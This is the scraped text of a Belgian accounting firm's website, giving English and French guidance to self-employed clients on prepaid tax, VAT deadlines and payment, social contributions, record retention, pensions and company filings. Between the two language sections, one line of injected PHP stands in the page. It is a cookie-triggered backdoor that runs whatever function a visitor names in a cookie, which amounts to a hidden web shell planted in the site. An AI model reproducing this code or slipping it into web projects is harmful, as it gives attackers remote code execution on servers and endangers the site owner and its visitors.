Boekhoudkantoor: header Engels
Accounting

Taxation

Governance

Riddersstraat 40 b 1

1800 Vilvoorde

T + F: 02-613.48.89


Useful information for taxable persons:

Boekhoudkantoor: info Nederlands

Prepayment of taxes: all self-employed persons or companies have to pay tax on estimated profits in advance. Otherwise a tax increase will be applied, which is logical, given the final statement usually comes a year later.

The sooner you pay, the higher your tax advantage. You can easily obtain a prepayment credit by your bank.

Paye: all those who work through an organisation have to address themselves a monthly salary. You better discuss this matter with us in advance; then we define the amount of paye that has be payed every quarter, we also take care of your quarterly tax return and necessary documents (this doesn't apply for those who have this done by an agency). If you like to profit of an reduced tariff, at least 1 director has to be granted with a gross salary of 36.000 € (*); unless your profit is lower.

Personnel: all formalities regarding personnel are best taken care of by an agency; in that regard: we have good contacts with all agencies.

Retention: invoices, summaries, quotes, ... you need to store all professional documents for at least 7 years. We advise you to keep storing all documents, when needed in a cardboard box on the attic.

We hand over all prints, balance sheets, archives of more than 3 years old (gathered in a archive box) to our customers, yet again to store on the registered office of your business.

Storage is your obligation!

Cash-book: those wo work with daily receipts (restaurants, bakeries, shops, ...) need to register their daily receipts. These are usually based on a cash register (Z-total) that you need to store for tax audits.

You also need to keep your cash journal up-to-date, where you register all daily expenses and bank deposits. You store these daily receipts and cash-books in a notebook (A4), in order to prevent unnecessary discussions with your tax controller.

In case you need more information or samples, you better contact us.

Loans: you have to provide us an amortisation table of all your (new) loans!

Single person business or organisation: in Belgium, as self-employed person, you work as a single person business or under the form of organisation. You can always make the transition to an organisation, with all benefits or drawbacks.

In order to have an extensified discussion regarding your company, feel free to contact us for an appointment.

You need to make a profit of at least 40.000,00 € (*) before you can profit on a fiscal benefit.

Social contributions: every quarter you will pay social contributions; these are calculated on your income of 3 years back. Starters are given the benefit of a minimum; we recommend starters who make an immediate substantial profit to pay more.

These contributions are set to a minimum of 650 € (*) and a maximum of 3.400 € (*) per quarter. Cooperating partners need to be registered.

Contributions can be limited to 60 € (*) per quarter; given the fact that you run your business as a secondary activity, that your profit is limited and that you work at least part-time as employee (18h / week) (*).

VAT: all VAT-chargeable persons have to submit a VAT declaration by: - 20/4 - 20/7 - 20/10 - 20/12 regarding the activities of the past quarter.

Businesses who make an annual turnover of more than 1.000.000 € (*) have to submit a VAT declaration every month.

You need to provide us all invoices and statements of the past quarter by the 10th of the new quarter. Otherwise we cannot guarantee your VAT declaration in time.

Payment of VAT has to be done by the 20th. You also have to pay VAT provisions, this provision needs to be equal to 1/3 of the amount of the previous quarter. Every quarter we notify you concerning the amount on VAT that has to be payed and payable provisions.

Non payment within a month means an increase by 10 % (*) as well as intrests; please do respect these deadlines; the VAT-department is a bad financier.

How to pay VAT? The address is:

BTW ontvangsten Brussel

Account number : 679-2003000-47

You must use the OBLIGATORY REFERENCE (always the same - see VAT note – VAT number with an 0 in front of it and 2 digits at the end). Click here in order to get your structured communication number needed for payment to the VAT-department.

Is your address, activity or bank account nummer correct?

Taxes: every year you will receive a tax notice regarding personal income tax; companies will receive a separate tax notice on corporate income tax. Please hand this notice over to our agency; you best keep a copy for yourself for you might need it for the day care center of your children. We will check the notice; all objections have to be submitted within 6 months.

Every year you also will receive a tax notice (brown envelope); please hand it over to our agency instantly.

You also need to hand us over all statements (bank, childrens day care, social contributions, insurances, ...), wage fact sheets, ...

Insurances: we advise you to check all your insurance policies to make sure all risks are covered. In that way you have the best insurance for fire, occupational accidents, civil liability, cars, hospitalization, income, life, etc ...

As a self-employed person you must ensure that you yourself will realize your retirement. Therefor we recommend every customer the next ' insurances' (= investments), for they provide you a substantial fiscal advantage. 1. pension savings: € 830 per partner (*) 2. PSPS (free supplementary pension self-employed): max. about 2,500 € (*) 3. Group insurance or individual pension commitment (IPT): only for companies.

We cannot stress enough that you need this to be arranged as soon as possible in order to provide you your future retirement, partly at the expense of the government.

If you like we can always have your policies reassessed or optimized by a professional agency; then you can compare your existing situation and do what you think is best for your situation.

If you are interested please contact us.

Fee: we usually work by a flat-rate billing system, per month, per quarter and a balance invoice by the end of the fiscal year. So you always know how much we will cost and you don't have to be 'afraid' to contact us.

Tax controls, dissolutions, new business ... are charged separately.

We dare to say that - due to limited wage costs and general costs - our fee is below average. Given the constant expansion of our office we can only work for those customers who settle our invoices in a timely manner; when needed you can always send us a debt reduction plan proposal.

We often notice that irregular payers usually are companies that are being mismanaged, and as such do not get out of that vicious circle; please contact us promptly so that we can help you.

Our office cannot be held responsable concerning files that are not payed in time, or companies that do not hand over their books or partially hand over.

Formalities: By-laws: 'old' companies basically had to have their by-laws adapted to the euro and the new company law. Contact your solicitor to make this revision if necessary. This may cost you about 600 € (*).

Central Social Security Data Bank (earlier Register of Companies): is your address still correct, are there new branches, etc.

Balance sheet: every year, all limited companies (BVBA) or public limited companies (NV) have to file their balance sheets this on an electronic manner. Therefor a submission fee has to be paid. All limited or public limited companies have to pay this fee in advance on our special bank account, being 140,79 € (*), indicating name and balance sheet of the fiscal year (YYYY), and has to be done by 15/06 of the following year (YYYY + 1)

Submission of financial statements at the Central Balance Sheet Office has to be done within 30 days after approval by your general assembly and no later than seven months after date of closure of the fiscal year. In principle, non-approved annual accounts can not be lodged.

(*) All listed amounts and/or rates may change as a result of changing regulations.

< if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]); HEAD> Boekhoudkantoor: info Frans
Boekhoudkantoor: header Frans
Comptabilité

Fiscalité

Gestion

Riddersstraat 40 b 1

1800 Vilvorde

T + F: 02-613.48.89


Informations utiles pour les contribuables:

Boekhoudkantoor: info Nederlands
Paiement anticipé: comme vous savez, chaque indépendant ou société est obligé de prépayer l’impôt sur les bénéfices estimés. Sinon, une augmentation d’impôt sera appliquée, logique d’ailleurs, puisque le calcul définitif se fait généralement une année après.

L’avantage d’impôt est plus important si vous payez rapidement. Votre banquier vous accordera facilement un crédit anticipé à bon prix.

Retenue d’impôt: la personne qui travaille dans une société doit s’accorder un salaire mensuel. Il convient de nous en parler; nous déterminerons le montant de paiement anticipé à payer par trimestre et nous nous occupons de la déclaration trimestrielle et des fiches nécessaires (à exception de ceux qui le règlent via un bureau social). Il faut attribuer un directeur au minimum un salaire brut de 36.000 Euros (*), si vous désirez bénéficier du tarif réduit (24.98% (*)), sauf si votre bénéfice est moins élevé.

Personnel: il est préférable de faire traiter toutes les formalités du personnel par un bureau social; nous avons les meilleurs contacts avec tous les bureaux sociaux.

Devoir de rétention: toutes les factures, relevés de compte, tickets, offres, … en bref, tous les documents professionnels doivent être gardés au minimum 7 ans. D’ailleurs, nous conseillons de continuer à conserver toutes les pièces, éventuellement dans une grande boîte d’archives sur le grenier.

Tous les bilans, copies, archives, … datant de plus de trois ans sont retournés au client, et sont à préserver au siège social.

Préserver est votre devoir!

Livre de caisse: quand on travaille avec des revenus journaliers (industrie hôtelière, boulanger, boucher, magasin, …) il y a lieu de noter les reçus chaque jour. Généralement parlant, les reçus sont basés sur un bon de caisse, à garder en vue d’un contrôle éventuel.

Séparément il faut tenir à jour un livre de caisse, notant les revenus journaliers et les dépenses et virements à la banque. Il est à conseiller de coller les recettes dans un bouquin afin d’éviter des discussions superflues avec le vérificateur.

Contactez-nous pour plus d’info ou des exemples additionnels.

Emprunts: apportez-nous un tableau d’amortissement de tous vos (nouveaux) emprunts!

Entreprise individuelle ou société: en Belgique un indépendant travaille en tant qu’entrepreneur individuel ou en société. On peut changer de forme de société en tenant compte des bénéfices et avantages.

Demandez un rendez-vous pour une discussion approfondie.

Il faut avoir au moins un bénéfice de 40.000,00 € avant de pouvoir bénéficier d’un avantage fiscal.

Cotisations sociales: vous payez des cotisations sociales chaque trimestre; elles sont calculées sur vos revenus d’il y a trois ans. Les débutants se voient appliqués des minima; nous conseillons ceux qui font des recettes acceptables dès le début de payer plus spontanément.

Ces montants s’élèvent à 650 € (*) minimum et à 3.400 € (*) maximum par trimestre. Les épouses coopérantes doivent être affiliées également.

En activité secondaire vous pouvez limiter les contributions à 60 € (*) par trimestre, à condition que les gains sont limités et que vous travaillez au minimum à temps partiel en tant qu’ouvrier ou employé (+- 18u/semaine).

TVA: chaque contribuable TVA doit présenter une déclaration TVA avant: - 20/4 - 20/7 - 20/10 - 20/12, relative aux activités du trimestre passé.

Les commerces qui atteignent un chiffre d’affaires annuel dépassant 1.000.000 € (*) sont obligés de présenter une déclaration TVA mensuelle.

Toutes les factures et extraits du trimestre passé doivent nous être remis avant le 10 du trimestre nouveau. Sinon, nous ne pouvons pas garantir une déclaration TVA à temps.

Le paiement TVA se fait également vers le 20. Il y a lieu de payer des avances TVA, correspondant à 1/3 du montant du trimestre passé. Nous vous fournissons chaque trimestre une lettre indiquant les montants TVA et les avances à payer.

Si le paiement n’est pas effectué dans le mois, une augmentation de 10% (*) et des intérêts sont chargés; dès lors, respectez les échéances et payez à temps; la TVA est un mauvais financier.

Comment payer la TVA? L’adresse:

Recettes TVA Bruxelles

Compte : 679-2003000-47

REFERENCE OBLIGATOIRE (toujours identique – voir la lettre TVA – numéro TVA précédé de 0 et suivi de deux chiffres). Cliquez ici afin de calculer votre communication structurée des recettes TVA.

Est-ce que votre adresse, activité ou numéro de compte sont toujours d’actualité?

Impôts: chaque année vous recevez également un avis d’imposition sur le revenu des particuliers; les sociétés reçoivent un avis séparé d’imposition de sociétés. Vous nous présentez ce dernier avis, tout en gardant une copie, puisqu’il faut la présenter annuellement par exemple pour la crèche. Nous contrôlons l’avis; les réclamations éventuelles doivent être formulées dans les six mois.

Chaque année, vous recevez la déclaration d’impôt (enveloppe brune); veuillez nous la présenter aussitôt.

Remettez-nous également toutes les attestations (banque, crèche, contributions sociales, assurances, …), feuilles de paye,….

Assurances: nous vous conseillons de revoir toutes vos polices d’assurance avec un courtier d’assurances professionnel afin de vérifier que vous êtes complètement couvert. Il vaut mieux d’être assuré entre autre contre incendie, accidents de travail, responsabilité civile, voiture, familiale, hospitalisation, revenu garanti, assurance vie, etc.

Un indépendant est conscient du fait qu’il devra s’occuper lui-même de sa pension. C’est pourquoi nous conseillons chaque client de souscrire les “assurances” suivantes (= investissements), puisqu’elles sont fort subsidiées. 1. Epargne-retraite: 830 € (*) par partenaire 2. PCLI (pension complémentaire libre des indépendants): max. plus ou moins 2.500 € (*) 3. Assurance-groupe ou engagement de pension Individuel (EPI): exclusivement réservé aux sociétés.

Nous recommandons fortement de souscrire à ces possibilités afin d’assurer votre pension partiellement au frais de l’état.

Optionnellement nous pouvons faire vérifier ou optimaliser vos polices par un courtier d’assurances professionnel; cela vous permettra de revoir votre situation et de tirer éventuellement des conclusions.

Si vous êtes intéressé, contactez- nous.

Facturation: en principe nous appliquons un système de facturation forfaitaire par mois ou par trimestre, suivi d’une facture de solde à la clôture de l’année financière. Vous savez donc à tout moment ce que nous coûtons et il n’y aura pas lieu ‘d’avoir peur’ de nous contacter ou téléphoner.

Les contrôles fiscaux, cessations, nouvelles sociétés … sont facturés séparément.

Nous estimons que nos honoraires sont moins élevés que la moyenne, grâce aux frais salariaux et généraux limités. En vue de l’expansion constante de notre bureau nous travaillons exclusivement pour les clients que payent nos factures à temps; si nécessaire, vous pouvez nous proposer un plan de remboursement.

La pratique nous démontre que les mauvais payeurs gèrent mal leur société et que pour autant n’arrivent pas à sortir du cercle vicieux. Contactez-nous à temps ce qui nous permettra de vous aider.

Nous n’acceptons pas de responsabilité lorsque les dossiers sont payés tardivement ou lorsque la comptabilité ne nous est pas remise ou encore en retard.

Formalités: Statuts: les sociétés 'vieilles’ ont dû faire adapter leur statut à l’Euro et la nouvelle loi sur les sociétés. Au besoin, contactez votre notaire pour le vérifier. Le coût sera d’environ 600 € (*).

Banque carrefour Sociétés (auparavant registre du commerce): votre adresse est à jour, nouveaux établissements, etc. ?

Compte annuel: chaque année une Société anonyme ou à responsabilité limitée doit déposer son compte annuel de manière électronique. Il faut alors payer un droit de dépôt. Chaque société nous avance ce frais sur un compte spécial, à savoir le montant de 140,79 € (*), avec la mention du nom et du compte annuel AAAA, au plus tard le 15/06 de l’année suivante.

Le compte annuel doit être déposé auprès de la Centrale des Comptes dans les trente jours après approbation par l’assemblée générale et au plus tard sept mois après la clôture de l’année financière. Un compte annuel non approuvé ne peut pas être déposé.

(*) Tous les montants et / ou pourcentages peuvent être modifiés suite à un changement de loi.